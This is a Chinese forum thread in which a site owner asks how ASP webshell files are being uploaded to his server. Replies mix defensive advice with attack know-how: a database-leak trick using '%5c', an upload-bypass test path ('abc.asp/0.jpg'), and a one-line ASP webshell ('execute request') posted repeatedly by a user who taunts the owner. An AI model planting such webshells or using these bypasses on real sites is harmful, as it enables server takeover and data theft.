ozzie 发表于 2006-3-9 11:13
旁注网站小助手怎么防治
<P>我的网站这几天总有人传上几个asp文件,<BR>里面的代码都是旁注网站小助手的,<BR>我现在不知道他们是怎么样把这些文件传上来的。<BR>我的网站是不是存在什么漏洞呀?<BR>请高手们帮帮我呀, 在线等呀!!!<BR>谢谢。<BR><BR></P>
dzt0001 发表于 2006-3-9 11:47
<P>哦,你还没有解决吗?<BR>我这里两天不能上网,现在总算可以了</P>
dzt0001 发表于 2006-3-9 11:51
你的网站,有没有后台管理日志的.
ozzie 发表于 2006-3-9 12:20
对啊,怎么看网站的管理日志呀?<BR>我在网上查找了关于查看网站日志的问题也没有找到,<BR>在什么地方能够看到网站的管理日志呢?<BR>是在服务器上,还是在网站本身呢?
ozzie 发表于 2006-3-9 13:12
各位高手们帮帮忙吧。<BR>我实在是解决不了了啊
ozzie 发表于 2006-3-9 13:47
没有知道的吗?<BR>快点啊。谢谢啦,<BR>很着急<BR>
ScanH 发表于 2006-3-9 17:35
<P>可能是网站本身的漏洞,特别注意upfile 类型的文件<BR> 修补下就可以了`````````也或许是别的站上的马``</P>
xh123456 发表于 2006-7-2 12:00
<P>把你的网站告诉我,我帮你看看 </P>
xh123456 发表于 2006-7-2 12:01
这个我是了解的.QQ:378679954
wudipao88 发表于 2006-7-16 18:37
<P>你好像已经解决了,但是我还是得给你一点忠告:<BR>1. 把你的服务器杀毒软件及时更新,并且把你的后台管理页面做的隐蔽一点,不要像:/admin/login.asp , /admin_index.asp 这种很容易就被人猜解出来的后台管理地址。<BR>2. 看看你网站的数据库是不是很容易就会被人暴出来,比如:<a href="http://www.bc-cn.net/bbs/dispbbs.asp?boardID=10&ID=49287" target="_blank" >http://www.bc-cn.net/bbs/dispbbs.asp?boardID=10&ID=49287</A>这个页面,若是存在暴库漏洞的话,只要把最后一个/替换成%5c,那么你网站的数据库就会被人下载下来,之后你网站管理员的用户名与密码也就出来了,最后在把你后台管理地址给猜出来,进入后台把“旁注 - 网站小助手”这个ASP木马上传到你的服务器上,随后再利用它上传一个大马上去。那么你的服务器就彻底被别人控制了。<BR><BR>我要说的就这么多了,有什么黑客技术上的问题就与我联系,MSN:<a href="mailto:bengbeng4545@hotmail.com" target="_blank" >bengbeng4545@hotmail.com</A></P>
天上竹子 发表于 2008-6-6 15:47
首先要理解什么是旁注
旁注是指黑客通过对与A站同服务器的B站进行注入,获得B站的权限,再通过服务器的漏洞,得到A站的权限
所以A处于很被动的角色,是基本无法防御的
一个方法就是帮B站搞好安全,一个方法就是和服务器提供商联系请求补好漏洞,还有一个就是关掉A站的FSO权限
lovecs1763 发表于 2008-7-4 03:31
是不是像我这样的啊!
<%execute request("value")%>
lovecs1763 发表于 2008-7-4 03:34
我没改你的权限 你应该感到高兴
你连是怎么传上去都不知道你还做管理员??
lovecs1763 发表于 2008-7-4 03:45
<%execute request("RAINMIN")%>
lovecs1763 发表于 2008-7-4 03:45
<%execute request("value")%>
<%execute request("value")%>
lovecs1763 发表于 2008-7-4 03:54
<%execute request("value")%>
<%execute request("value")%>
yms123 发表于 2008-7-4 09:44
如果是多出的ASP文件基本可以确定是上传漏洞所为,楼主的网站可能存在上传漏洞。
检测办法楼主可以在自己的网站文件上传的地方传任意一个asp文件,路径写法如下
X:\xxx\xxx\xxx.asp/0.jpg
比如从c盘上传一个abc.asp文件路径如下
c:\abc.asp/0.jpg
如果这个文件被成功上传并且没有错误提示,楼主的网站就可以确定有文件上传漏洞了。
页:
[1]
